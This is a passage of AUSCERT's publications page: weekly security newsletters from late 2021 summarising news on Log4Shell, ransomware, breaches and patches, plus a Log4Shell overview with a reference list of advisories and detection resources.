Publications

AUSCERT Week in Review for 17th December 2021 Greetings, With only seven sleeps until Christmas, the realisation that the end of the year being upon us has well and truly set in! A reminder of our scheduled shutdown over the Christmas and New Year period: AUSCERT will be closed from Thursday, December 23rd until Monday, January 3rd 2022. We will reopen on Tuesday, January 4th 2022. The auscert@auscert.org.au mailbox will not be monitored during this period. However, we will staff the 24/7 member incident hotline as usual; so do call us for any urgent matters during this period. If you’re looking for something to do over the break, don’t forget the Call for Presentations for AUSCERT2022 is OPEN! We’re looking for something unique, a great story or, something new that can be shared with our attendees. The closing date for submissions is January 10th so be sure to get your idea to our committee to ensure feedback can be provided by the final deadline of January 30th. Also AUSCERT is hiring, so if you’re interested in infrastructure, putting together security solutions and working collaboratively with cyber security analysts, brush off your resume and send it to us over the break! Something that we have been reminded of this past week with Log4J, is that the world of cyber doesn’t have holidays and we must always remain vigilant. A recent blog from Seriously Risky Business provides a great overview of the situation and suggests how future occurrences of similar incidents can be avoided. Another blog post, this time from Rapid 7, highlights how threat actors seek to take advantage of large scale vulnerabilities such as Log4J, often working just as hard as those trying to remedy the situation, but with the aim to exploit the vulnerability. As this is the last Week In Review before Christmas, and with a lot of folk switching off for a well-earned break, the team at AUSCERT wanted to wish everyone a safe and happy Christmas and Festive Season and all the very best for 2022. Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation Date: 2021-12-11 Author: Microsoft Security Blog [This article is focused on the use of Microsoft security products to mitigate exploits. See also ASB-2021.0244.2, published December 10.] Microsoft’s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of CVE-2021-44228, a remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as “Log4Shell”. The vulnerability allows unauthenticated remote code execution, and it is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j 2 vulnerable component. For more technical and mitigation information about the vulnerability, please read the Microsoft Security Response Center blog. Bugs in billions of WiFi, Bluetooth chips allow password, data theft Date: 2021-12-13 Author: Bleeping Computer Researchers at the University of Darmstadt, Brescia, CNIT, and the Secure Mobile Networking Lab, have published a paper that proves it’s possible to extract passwords and manipulate traffic on a WiFi chip by targeting a device’s Bluetooth component. Modern consumer electronic devices such as smartphones feature SoCs with separate Bluetooth, WiFi, and LTE components, each with its own dedicated security implementation. Second Log4j vulnerability discovered, patch already released Date: 2021-12-15 Author: ZDNet A second vulnerability involving Apache Log4j was found on Tuesday after cybersecurity experts spent days attempting to patch or mitigate CVE-2021-44228. The description of the new vulnerability, CVE 2021-45046, says the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was “incomplete in certain non-default configurations.” “This could allow attackers… to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack,” the CVE description says. Why Companies Shouldn’t Shame Employees Who Fall for Hacking Scams Date: 2021-12-06 Author: Wall Street Journal [This article may be behind a paywall for some readers] The implications of our survey were clear: Shame is similar to a boomerang that will come back to hurt the organization, as well as harming the employee. Managers should deal with the mistake, but not reject the employee. If employees feel that their personhood is being attacked, they will respond defensively. Shaming results in a lose-lose outcome. Employees can be an organization’s greatest asset when it comes to defeating the efforts of cybercriminals. Using shame as a behavior modification tool squanders that potential. And that’s the real shame. Google pushes emergency Chrome update to fix zero-day used in attacks Date: 2021-12-13 Author: Bleeping Computer Google has released Chrome 96.0.4664.110 for Windows, Mac, and Linux, to address a high-severity zero-day vulnerability exploited in the wild. “Google is aware of reports that an exploit for CVE-2021-4102 exists in the wild,” the browser vendor said in today’s security advisory. Although the company says this update may take some time to reach all users, the update has already begun rolling out Chrome 96.0.4664.110 worldwide in the Stable Desktop channel. Actively Exploited Microsoft Zero-Day Allows App Spoofing, Malware Delivery Date: 2021-12-14 Author: Threat Post Microsoft has addressed a zero-day vulnerability that was exploited in the wild to deliver Emotet, Trickbot and more in the form of fake applications. The patch came as part of the computing giant’s December Patch Tuesday update, which included a total of 67 fixes for security vulnerabilities. The patches cover the waterfront of Microsoft’s portfolio, affecting ASP.NET Core and Visual Studio, Azure Bot Framework SDK, Internet Storage Name Service, Defender for IoT, Edge (Chromium-based), Microsoft Office and Office Components, SharePoint Server, PowerShell, Remote Desktop Client, Windows Hyper-V, Windows Mobile Device Management, Windows Remote Access Connection Manager, TCP/IP, and the Windows Update Stack. Australia to establish youth advisory council for countering online child exploitation Date: 2021-12-15 Author: ZDnet Australia will create a new panel consisting of Australian youths and young adults that will provide consultation to industry and government about how to approach regulating online platforms. “Young people know better than anyone about the good, the bad and the plain ugly that exists in the online world,” Prime Minister Scott Morrison said. “They are the first generation of Australians to grow up living simultaneously in both the real and digital worlds, and they are always at the forefront of new technologies. Visa pilots enumeration attack prevention requirement in Australia Date: 2021-12-15 Author: IT News Visa has chosen Australia as the first country worldwide where all “e-commerce payment providers” must have botnet detection capabilities in place by October to mitigate the threat posed by enumeration attacks. The payments giant said it could not fight a rise in enumeration attacks alone and needed the assistance of the entire payments ecosystem. ESB-2021.4192 – apache-log4j2: Execute arbitrary code/commands – Remote/unauthenticated An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled ESB-2021.4268 – Safari: Execute arbitrary code/commands – Remote with user interaction Processing maliciously crafted web content may lead to arbitrary code execution on Safari browser ASB-2021.0245 – ALERT Microsoft Windows: Multiple vulnerabilities Microsoft has released its monthly security patch update and the update resolves 38 vulnerabilities across their products ASB-2021.0252 – ALERT Microsoft Edge (Chromium-based): Multiple vulnerabilities Microsoft addressed a Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability on their newest update ASB-2021.0253 – Azure Products: Multiple vulnerabilities Microsoft states “Successful exploitation allows for arbitrary code execution in the targeted application” Stay safe, stay patched and Merry Christmas and a Happy New Year! The AUSCERT team

Log4Shell-Logjam Overview Picture credit : Lunasec[1] TLDR; Patch, check your patches work, check logs for attempts and possible compromise.   Log4Shell is a tag used by Lunasec[1] to describe the vulnerability in Apache Log4j2 that was disclosed abruptly by a tweet[2] and a github repo. This sudden announcement alerted security professionals to work in a short time frame to protect systems and avoid other interested parties in discovering, compromising and potentially taking over systems. Security groups alerted through the above were computer emergency response teams, which recognised the impact and came out with early advisories[3][4][5] which are either being updated or are being referenced by newer advisories[6]. The attack surface was of prime concern and security professionals were exchanging ways to detect through various third party search results.  One of the lists of the attack surface that was published early showed that Log4Shell or LogJam would affect a large number of systems[7][8].  Ways to detect affected servers were refined into a script[9][10] and other entities also released tools to detect vulnerable servers through first party scanning[11][12][13].  First party scanning is not of concern but unauthorised second party scanning is. This activity was eventually detected[14], and exploit payloads soon followed[15]. The manner in which the vulnerability was disclosed gave a short time frame for the naming and grading.  This was evident as the PSIRT initial only had release candidates[16][17] which later were checked and reported that both had to be used[18]. The vulnerability was later allocated CVE-2021-44228[19] and carried the PSIRT’s analysis[20][21] of a CVSSv3 base score of a perfect 10.0. (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). Before a full patch was available by the PSIRT[22], mitigations were collated and a vaccine made available[23][24] to provide an easy way to mitigate[24] the unauthorised second party scanning attempts to drop a malicious payload. No doubt there will be more numerous and extensive reports[26][27][28][29][30][31][32][33][34][35] made available by noted security organisations, as well as a plethora of resources listed to help[36][37], but the advice right now is as the TLDR, check your version[38][39], patch, check your patch, check your logs for attempts and possible compromise[40], and take remediation steps if any IoC show up[41][42][43][44][45][46]. In a time span no longer than a week CVE-2021-44228 has gone from proof of concept drop to internet wide scans to carrying crypto-coin miner payloads to no being found to carry ransomware payloads.[47][48] Finally, if your weekend was thought to be hectic as a result of this abrupt disclosure, send some positive thoughts to the three volunteers[49][50] who maintain a piece of code that the internet has come to depend so much on.  These three volunteers have worked very hard getting us a patch as soon as possible.[51] As well, we would like to thank all the contributors that have made this article possible by submitting to us relevant links and articles. [1] Lunasec Advisory https://www.lunasec.io/docs/blog/log4j-zero-day/ [2] Tweeted 0-Day https://twitter.com/P0rZ9/status/1468949890571337731 [3] NZCERT https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/ [4] AUSCERT ASB https://portal.auscert.org.au/bulletins/ASB-2021.0244.2 [5] SingCERT https://www.csa.gov.sg/en/singcert/Alerts/al-2021-070 [6] AUSCERT ESB https://portal.auscert.org.au/bulletins/ESB-2021.4186 [7] Attack Surface https://github.com/YfryTchsGD/Log4jAttackSurface [8] Randori Blog https://www.randori.com/blog/cve-2021-44228/ [9] log4j_rce_check https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6 [10] Log4j2Scan https://github.com/whwlsfb/Log4j2Scan [11] Qualys Detection https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell [12] SocPrime https://socprime.com/blog/cve-2021-44228-detection-notorious-zero-day-in-log4j-java-library/ [13] Imperva https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/ [14] Log4j RCE Attempts https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217 [15] Cloudflare Blog https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/ [16] PSIRT rc1 https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1 [17] PSIRT rc2 https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2 [18] CyberKendra https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html [19] NVDB https://nvd.nist.gov/vuln/detail/CVE-2021-44228 [20] RecordedMedia https://therecord.media/log4j-zero-day-gets-security-fix-just-as-scans-for-vulnerable-systems-ramp-up/ [21] PSIRT Advisory https://logging.apache.org/log4j/2.x/security.html [22] PSIRT Download https://logging.apache.org/log4j/2.x/download.html [23] Cybereason Blog https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-log4shell-vulnerability-cve-2021-44228 [24] Cyberreason Vax https://github.com/Cybereason/Logout4Shell [25] DarkReading https://www.darkreading.com/dr-tech/what-to-do-while-waiting-for-the-log4ju-updates [26] PaloAlto https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/ [27] Cloudflare Blog https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/ [28] Cloudflare Blog https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/ [29] Sygnia Advisory https://blog.sygnia.co/log4shell-remote-code-execution-advisory [30] ISC SANS Diary https://isc.sans.edu/forums/diary/RCE+in+log4j+Log4Shell+or+how+things+can+get+bad+quickly/28120/ [31] ISC SANS Diary https://isc.sans.edu/forums/diary/Log4j+Log4Shell+Followup+What+we+see+and+how+to+defend+and+how+to+access+our+data/28122/ [32] Crowdstrike https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/ [33] Bleeping Computer https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/ [34] Trusted Sec https://www.trustedsec.com/blog/log4j-playbook/ [35] Bleeping Computer https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/ [36] Reddit List of resources on log4j  https://www.reddit.com/r/netsec/comments/rcwws9/rce_0day_exploit_found_in_log4j_a_popular_java/ [37] CVE-2021-44228-Log4Shell-Hashes  https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes [38] NCSC-NL https://github.com/NCSC-NL/log4shell [39] BlueTeam CheatSheet https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592 [40] Log4ShellDetector  https://github.com/Neo23x0/log4shell-detector [41] Bazaar https://bazaar.abuse.ch/browse/tag/log4j [42] URLHaus https://urlhaus.abuse.ch/browse/tag/log4j [43] Threatfox https://threatfox.abuse.ch/browse/tag/log4j [44] CuratedIntel https://github.com/curated-intel/Log4Shell-IOCs [45] Microsoft Guidance https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/ [46] TryHackme https://tryhackme.com/room/solar [47] Twitter https://twitter.com/80vul/status/1470272820571963392?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Etweet [48] Twitter https://twitter.com/ankit_anubhav/status/1470648109625536515 [49] Twitter “@FiloSottile” https://twitter.com/FiloSottile/status/1469441487175880711 [50] Twitter “@matthew_d_green” https://twitter.com/matthew_d_green/status/1469715416549367812 [51] ITNews https://www.itnews.com.au/news/log4js-project-sponsorship-skyrockets-after-critical-bug-exploitation-573914

AUSCERT Week in Review for 10th December 2021 Greetings, The Call for Presentations for the AUSCERT2022 Conference is NOW OPEN. The Conference will be held as a hybrid event from Tuesday, 10th May – Friday, 13th May 2022 at The Star Gold Coast, Broadbeach and online via the OnAIR Virtual Conferencing Platform. If you or someone you know has a great story to tell, we would like to hear it! It could be something unique to say on a topic of interest to our community or, an extraordinary project that others would benefit from. Perhaps it’s a clever way of optimising a process that is otherwise time-consuming? Submit to AUSCERT2022. Call for Presentations and Tutorials, due in January 2022. Submit by 10 January to receive feedback from our committee for further improvements before the final deadline of 30 January. AUSCERT was proud to be a Bronze sponsor of the 2021 Australian Women in Security Awards which were handed out earlier this week. Once a year, the security industry gathers to celebrate and raise the profile of the Australian IT Security, Cyber, and Protective Security industry to inspire young women and men to consider a career in this sector. This is done by honouring their accomplishments, value, and contributions to the Australian market and giving the recognition they deserve. This week, it was announced that Queensland borders would open to the rest of Australia on Monday, December 13 at 1:00am. As part of the ongoing focus on community safety, we’re all being reminded and encouraged to check-in when out and about in the community. With the growth in the number of phishing messages delivered to smart phones, it’s imperative to use the official apps from respective government bodies when visiting venues and using services (such as ride share). Queensland government energy generator says ransomware attack not state-based Date: 2021-12-09 Author: ZDNet Queensland government-owned energy generator CS Energy provided an update on Wednesday that those behind its November ransomware incident was unlikely to be a state-based actor. On the same morning, Sydney’s Daily Telegraph landed with a front page claiming China was behind the incident. Thanks to the appearance of CS Energy on a leak site listing victims of Conti ransomware run by the Wizard Spider group for the purposes of double extortion, the claims made by News Limited would appear to be unfounded. Emotet now drops Cobalt Strike, fast forwards ransomware attacks Date: 2021-12-07 Author: Bleeping Computer In a concerning development, the notorious Emotet malware now installs Cobalt Strike beacons directly, giving immediate network access to threat actors and making ransomware attacks imminent. Emotet is a malware infection that spreads through spam emails containing malicious Word or Excel documents. These documents utilize macros to download and install the Emotet Trojan on a victim’s computer, which is then used to steal email and deploy further malware on the device. Historically, Emotet would install the TrickBot or Qbot trojans on infected devices. These Trojans would eventually deploy Cobalt Strike on an infected device or perform other malicious behaviour. SolarWinds hackers have a whole bag of new tricks for mass compromise attacks Date: 2021-12-07 Author: Ars Technica Almost exactly a year ago, security researchers uncovered one of the worst data breaches in modern history, if not ever: a Kremlin-backed hacking campaign that compromised the servers of network management provider SolarWinds and, from there, the networks of 100 of its highest-profile customers, including nine US federal agencies. […] The latest reminder of the group’s proficiency comes from security firm Mandiant, which on Monday published research detailing Nobelium’s numerous feats—and a few mistakes—as it continued to breach the networks of some of its highest-value targets. Hackers infect random WordPress plugins to steal credit cards Date: 2021-12-08 Author: Bleeping Computer According to a new report by Sucuri, hackers performing credit card theft are first hacking into WordPress sites and injecting a backdoor into the website for persistence. These backdoors allow the hackers to retain access to the site, even if the administrator installs the latest security updates for WordPress and installed plugins. When the attackers use the backdoor in the future, it will scan for a list of administrator users and use their authorization cookie and current user login to access the site. AWS outage impacts Ring, Netflix, and Amazon deliveries Date: 2021-12-07 Author: Bleeping Computer Amazon AWS in the US-EAST-1 Region is suffering an outage that affected numerous online services, including Ring, Netflix, Amazon Prime Video, and Roku. The ongoing outage started at approximately 12 PM EST and is caused by problematic network equipment affecting the US-EAST-1 AWS region, which feeds a good portion of the connectivity for people in the northeastern part of the United States. FBI warning: Hackers targeting flaw in Zoho ManageEngine ServiceDesk Plus Date: 2021-12-03 Author: ZDNet The FBI and the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) are warning about the ‘active exploitation’ of a bug in Zoho ManageEngine ServiceDesk Plus before 11306. “Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. This is related to /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration,” CISA and the FBI note about the vulnerability tracked as CVE-2021-44077. Cryptocurrency scams targeting Australians as scammers bank more than $100 million Date: 2021-12-08 Author: ABC News Australian Federal Police say cryptocurrency scams have “exploded” during the pandemic, with new figures from the Australian consumer watchdog showing a 172 per cent increase in losses between January and November this year, totalling $109 million. The scams are run by global syndicates, and the money trail is murkier than ever. A mysterious threat actor is running hundreds of malicious Tor relays Date: 2021-12-03 Author: The Record Since at least 2017, a mysterious threat actor has run thousands of malicious servers in entry, middle, and exit positions of the Tor network in what a security researcher has described as an attempt to deanonymize Tor users. Tracked as KAX17, the threat actor ran at its peak more than 900 malicious servers part of the Tor network, which typically tends to hover around a daily total of up to 9,000-10,000. Some of these servers work as entry points (guards), others as middle relays, and others as exit points from the Tor network. ASB-2021.0244 – ALERT log4j: Execute arbitrary code/commands – Remote/unauthenticated log4j, a popular java logging package, has been reported to be vulnerable to remote code execution ESB-2021.4107 – NGINX ModSecurity WAF: Denial of service – Existing account An attacker using specifically formatted JSON messages can cause high resource utilization and potentially denial-of-service (DoS) on NGINX ModSecurity WAF ESB-2021.4120 – openssh: Increased privileges – Existing account Openssh privilege escalation vulnerability fixed on newest SUSE security update ESB-2021.4131 – Wireshark: Denial of service – Remote with user interaction Wireshark network protocol analyzer tool released a new update that fixes 8 vulnerabilities ESB-2021.4160 – Firefox and Firefox ESR : Multiple vulnerabilities An incorrect type conversion of sizes from 64bit to 32bit integers allowed an attacker to corrupt memory leading to a potentially exploitable crash Stay safe, stay patched and have a good weekend! The AUSCERT team

AUSCERT Week in Review for 3rd December 2021 Greetings, This Saturday marks three weeks until Christmas Day, a date that seems to be rapidly approaching! The festive season can often feel as though you’re being pulled in multiple directions. Some organisations slow down whilst others maintain and increase their activity as the year nears its end. Whatever the industry or however busy you may be, the following article provides Twelve Tips for Christmas Cybersecurity that apply to both our personal, and professional lives. There has been growing belief that nobody should have the ability to hide behind anonymous social media accounts, engaging in inappropriate commentary and conduct. As a result, the Australian government this week drafted anti-trolling legislation that will aim to clarify who is responsible for content published online. Requirements such as a mandatory complaints processes and a mandate for social media companies to provide names and contact details, are just some of the suggested laws that could be introduced as soon as early 2022. The scheduled rollout of mandatory two-factor authentication (2FA) by tech giant Google, will be activated automatically next Thursday, November 9. You can customize your 2FA, for either personal and business accounts with the options available on the Google Workspace Admin page that also contains additional information about the 2FA requirements, processes and support. Lastly, The University of Queensland and BLUE Inc. (Tokyo) are partnering to offer two half-day workshop seminars to address complex cyber security challenges, engage researchers, industry experts and students. Industry professionals from both countries will be presenting across four themes aimed at promoting and sharing game-changing interdisciplinary research between Australia and Japan. The workshops will be held in-person and online via Zoom on Wednesday 8 December and Wednesday 15 December. Click on your preferred date to learn more and register. Microsoft Exchange servers hacked to deploy BlackByte ransomware Date: 2021-12-01 Author: Bleeping Computer The BlackByte ransomware gang is now breaching corporate networks by exploiting Microsoft Exchange servers using the ProxyShell vulnerabilities. ProxyShell is the name for a set of three Microsoft Exchange vulnerabilities that allow unauthenticated, remote code execution on the server when chained together. Panasonic confirms cyberattack and data breach Date: 2021-11-30 Author: ZDNet Tech manufacturing giant Panasonic has confirmed that it’s network was accessed illegally this month during a cyberattack. In a statement released on Friday, the Japanese company said it was attacked on November 11 and determined that “some data on a file server had been accessed during the intrusion.” “After detecting the unauthorized access, the company immediately reported the incident to the relevant authorities and implemented security countermeasures, including steps to prevent external access to the network,” Panasonic said in a statement. “In addition to conducting its own investigation, Panasonic is currently working with a specialist third-party organization to investigate the leak and determine if the breach involved customers’ personal information and/or sensitive information related to social infrastructure.” CISA Releases Guidance on Securing Enterprise Mobile Devices Date: 2021-11-29 Author: SecurityWeek The United States Cybersecurity and Infrastructure Security Agency (CISA) last week published a Capacity Enhancement Guide to help organizations secure mobile devices and their access to enterprise resources. The Enterprise Mobility Management system checklist is meant to help businesses mitigate vulnerabilities and increase overall enterprise protections by implementing a series of best practices for securing enterprise-managed mobile devices. Microsoft Defender scares admins with Emotet false positives Date: 2021-11-30 Author: Bleeping Computer Microsoft Defender for Endpoint is currently blocking Office documents from being opened and some executables from launching due to a false positive tagging the files as potentially bundling an Emotet malware payload. Windows system admins are reporting that this is happening since updating Microsoft’s enterprise endpoint security platform (previously known as Microsoft Defender ATP) definitions to version 1.353.1874.0. When triggered, Defender for Endpoint will block the file from opening and throw an error mentioning suspicious activity linked to Win32/PowEmotet.SB or Win32/PowEmotet.SC. Hackers could steal encrypted data now and crack it with quantum computers later, warn analysts Date: 2021-12-01 Author: ZDNet Beijing-backed hackers might soon start trying to steal encrypted data — such as biometric info, the identities of covert spies, and weapons designs — with a view to decrypting it with a future quantum computer, according to analysts at US tech consultancy Booz Allen Hamilton (BAH). “In the 2020s, Chinese economic espionage will likely increasingly steal data that could be used to feed quantum simulations,” the analysts write in the report Chinese Threats in the Quantum Era. At risk are data protected by the current algorithms underpinning public-key cryptography, which some fear may be rendered useless for protecting data once quantum computers become powerful enough. Prediction Season: What’s in Store for Cybersecurity in 2022? Date: 2021-12-01 Author: Security Week The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks; cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all lives. More than 300,000 Play Store users infected with Android banking trojans Date: 2021-11-29 Author: The Record More than 300,000 Android users were infected with banking trojans after installing apps from the official Google Play Store over the past few months, mobile security firm ThreatFabric said today. The malicious code was hidden inside fully functional apps that operated as QR code scanners, PDF scanners, security tools, fitness apps, and two-factor authenticators. But besides the legitimate functionality they offered, these apps also included a special module called a “loader.” In the cybersecurity field, loaders are small pieces of malware that are hidden inside an app. They typically contain very little and very benign functionality, such as the ability to connect to a remote server to download and run additional code. IKEA email systems hit by ongoing cyberattack Date: 2021-11-26 Author: Bleeping Computer IKEA is battling an ongoing cyberattack where threat actors are targeting employees in internal phishing attacks using stolen reply-chain emails. A reply-chain email attack is when threat actors steal legitimate corporate email and then reply to them with links to malicious documents that install malware on recipients’ devices. As the reply-chain emails are legitimate emails from a company and are commonly sent from compromised email accounts and internal servers, recipients will trust the email and be more likely to open the malicious documents. ESB-2021.1489.3 – UPDATED ALERT Real-time Operating Systems (RTOS) products: Multiple vulnerabilities ICS-CERT updated the affected products and mitigation details on the advisory tilted “ICS Advisory (ICSA-21-119-04) Multiple RTOS” issued on 30 November 2021 ESB-2021.4031 – kernel and kernel -rt: Multiple vulnerabilities RedHat advised that an update was released to fix multiple vulnerabilities found in Kernel and Kernel RT ESB-2021.4065 – Network Security Services : Multiple vulnerabilities Mozilla Foundation Security Advisory 2021-51 reported critical issues affecting Network Security Services versions prior to 3.73 or 3.68.This vulnerability impacts email clients and PDF viewers that use NSS ESB-2021.4062 – Thunderbird: Multiple vulnerabilities Issues in Network Security Services can cause Thunderbird to crash, resulting in a denial of service or execution of arbitrary code. The problem can be corrected by applying the updates Stay safe, stay patched and have a good weekend! The AUSCERT team

AUSCERT Week in Review for 26th November 2021 Greetings, Did you know that the first known computer virus was called the Creeper Virus? It affected the Advanced Research Projects Agency Network (ARPANET), the precursor to today’s internet. Since then, many more cyber attacks have occurred all over the world and have grown in sophistication and potential impact. Tuesday 30 November is Computer Security Day, a timely reminder for individuals and businesses to stay on top of cyber security, ensuring the necessary steps are taking to protect their data. Some suggestions to help you include changing your passwords across all platforms, devices, and services and sign-up to a trusted password manager so you don’t have to remember them all! Update your spyware and malware protection software and review your security strategy and best practices for staff, checking their understanding of what to do, when and how. Time is running out to complete the 2021 BDO and AUSCERT Cyber Security Survey, closing at midnight on Friday, 3 December 2021. The 10-minute survey is an opportunity to benchmark your organisation’s cyber security efforts, by gaining access to valuable data and insights into the cyber threats faced by your industry peers. Don’t forget, survey respondents will go in the draw to win an Apple Watch so, take part now for your chance to win! Australia has a cybercrime under-reporting problem Date: 2021-11-22 Author: Consultancy.com.au When global IT and cybersecurity association ISACA [Information Systems Audit and Control Association] declared that “under-reporting [of] cybercrime – even when disclosure is legally mandated – appears to be the norm” back in 2019, it rang alarm bells and led to a flurry of headlines. “Half of all survey respondents believe most enterprises underreport cybercrime, even when it is required to do so,” ISACA reported. GoDaddy’s Latest Breach Affects 1.2M Customers Date: 2021-11-22 Author: Threat Post The kingpin domain registrar has logged its fifth cyber-incident since 2018, after an attacker with a compromised password stole email addresses, SSH keys and database logins. Ransomware warning: Hackers see holidays and weekends as a great time to attack Date: 2021-11-23 Author: ZDNet Ahead of Thanksgiving this Thursday, the US Cybersecurity and Infrastructure Agency (CISA) and the FBI have released a warning for critical infrastructure providers to stay vigilant on holidays and weekends, because hackers don’t plan on taking a holiday break. The agency issued a similar warning in August ahead of the Labor Day weekend, warning that ransomware attackers often choose to launch attacks on holidays and weekends, specifically when businesses are likely to be closed. Apple sues spyware-maker NSO Group, notifies iOS exploit targets Date: 2021-11-23 Author: Bleeping Computer Apple has filed a lawsuit against Pegasus spyware-maker NSO Group and its parent company for the targeting and spying of Apple users with surveillance tech. The company says the state-sponsored attacks that used NSO’s spyware only targeted “a very small number” of individuals, across multiple platforms, including iOS and Android. The exploits used to deploy NSO Group’s Pegasus spyware were used to hack and compromise the devices of high-profile targets such as government officials, diplomats, activists, dissidents, academics, and journalists worldwide. Black Friday: Online retailers exposed to email fraud and domain impersonation Date: 2021-11-23 Author: Cyber Security Connect Proofpoint has released new research that found one in four of the top online retailers in Australia today are wide open to email fraud and domain impersonation, with days to go until the start of the shopping spree of Black Friday and Cyber Monday. The study looked at the DMARC (domain-based message authentication reporting and conformance) records of the top 100 shopping websites ranked by Power Retail. It found that 27 companies have no DMARC protocol, leaving their customers, employees, partners and vendors exposed to receiving emails from scammers posing as trusted retailers. To date, only 16 top online retailers have achieved the highest level of DMARC protection, allowing these companies to block fraudulent emails from reaching inboxes. Coin mining, ransomware, APTs target cloud: GCAT report Date: 2021-11-24 Author: Google Cloud While cloud customers continue to face a variety of threats across applications and infrastructure, many successful attacks are due to poor hygiene and a lack of basic control implementation. Most recently, our internal security teams have responded to cryptocurrency mining abuse, phishing campaigns, and ransomware. Given these specific observations and general threats, organizations that put emphasis on secure implementation, monitoring and ongoing assurance will be more successful in mitigating these threats or at the very least reduce their overall impact. The [Threat Horizons] report’s goal is to provide actionable intelligence that enables organizations to ensure their cloud environments are best protected against ever-evolving threats. In this and future threat intelligence reports, the Google Cybersecurity Action Team will provide threat horizon scanning, trend tracking, and Early Warning announcements about emerging threats requiring immediate action. ESB-2021.3963 – php72: Root compromise – Existing account The new update for php72 fixes local privilege escalation via PHP-FPM and is available for install now ESB-2021.3958 – ALERT salt: Multiple vulnerabilities Multiple security vulnerabilities have been discovered in Salt execution manager which is open-source software for data-driven orchestration and remote execution ESB-2021.3965 – MozillaFirefox: Multiple vulnerabilities Multiple Mozilla Firefox vulnerabilities have been discovered which are capable of resulting in the execution of code ASB-2021.0242 – Microsoft Edge (Chromium-based): Execute arbitrary code/commands – Remote with user interaction Microsoft addressed Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability on their newest update ESB-2021.3999 – VMware vCenter Server and Cloud Foundation: Multiple vulnerabilities Multiple vulnerabilities in VMware vCenter Server were privately reported to VMware and their new updates addressed arbitrary file read and SSRF vulnerabilities on affected products Stay safe, stay patched and have a good weekend! The AUSCERT team

AUSCERT Week in Review for 19th November 2021 Greetings, This Sunday, November 21, is World Television Day. A time to pay homage to the tube, and in so many cases, the saviour to our recent spate of lockdown induced boredom! The day was established by the United Nations in 1996 to recognize the impact television has in bringing world attention to conflicts and threats to peace and security and its potential in highlighting issues of importance and significance. So, T.V. isn’t just a device to binge watch the latest season of your favourite show, in fact, as technology evolves and becomes more integrated, the use of the humble ‘idiot box’ as a major tool to inform, educate and connect enhances. For those that have a Smart T.V., the following We Live Security article discusses why such T.V.s make for attractive and potentially soft targets, and how cybercriminals can ruin more than your T.V. viewing experience Podcasts are another way of sharing information and engaging with people far and wide with the latest in our ‘Share Today, Save Tomorrow’ series released earlier in the week. Episode 7, ‘The future of the cyber security pipeline and education in Australia’. includes a discussion featuring Prof. Ryan Ko and Ivano Bongiovanni on how The University of Queensland Cyber Security is helping build a pipeline of cybersecurity talent. It also includes insights from AUSCERT Senior Analyst Mark about how we are supporting UQ Cyber Security through lectures as well as supervising student capstone and research projects, and more! Today also marks thirty-six days until Christmas, yikes! With a marked shift to online shopping during the pandemic, many of us may have already started purchasing presents to ensure delivery whilst the rest of us had better get started! Gov unveils principles to help secure critical technology supply chains Date: 2021-11-15 Author: iTnews The federal government has unveiled a final set of regulatory principles aimed at helping businesses secure the supply chains of critical technologies like artificial intelligence and quantum computing. New study shows workplace blame cultures undermining cloud adoption Date: 2021-11-17 Author: Cyber Security Connect New research by Veritas Technologies highlights the damage that workplace blame cultures are having on the success of cloud adoption, which found that businesses are losing critical data, such as customer orders and financial data, because office workers are too scared or too embarrassed to report data loss or ransomware issues when using cloud applications, such as Microsoft Office 365. Among the latest Veritas findings, half (50 per cent) of office workers have accidentally deleted files hosted in the cloud – such as business documents, presentations and spreadsheets. The report also gathered that as many as 14 per cent of office workers do so multiple times per week. Amazon’s Dark Secret: It Has Failed to Protect Your Data Date: 2021-11-18 Author: WIRED According to internal documents reviewed by Reveal from the Center for Investigative Reporting and WIRED, Amazon’s vast empire 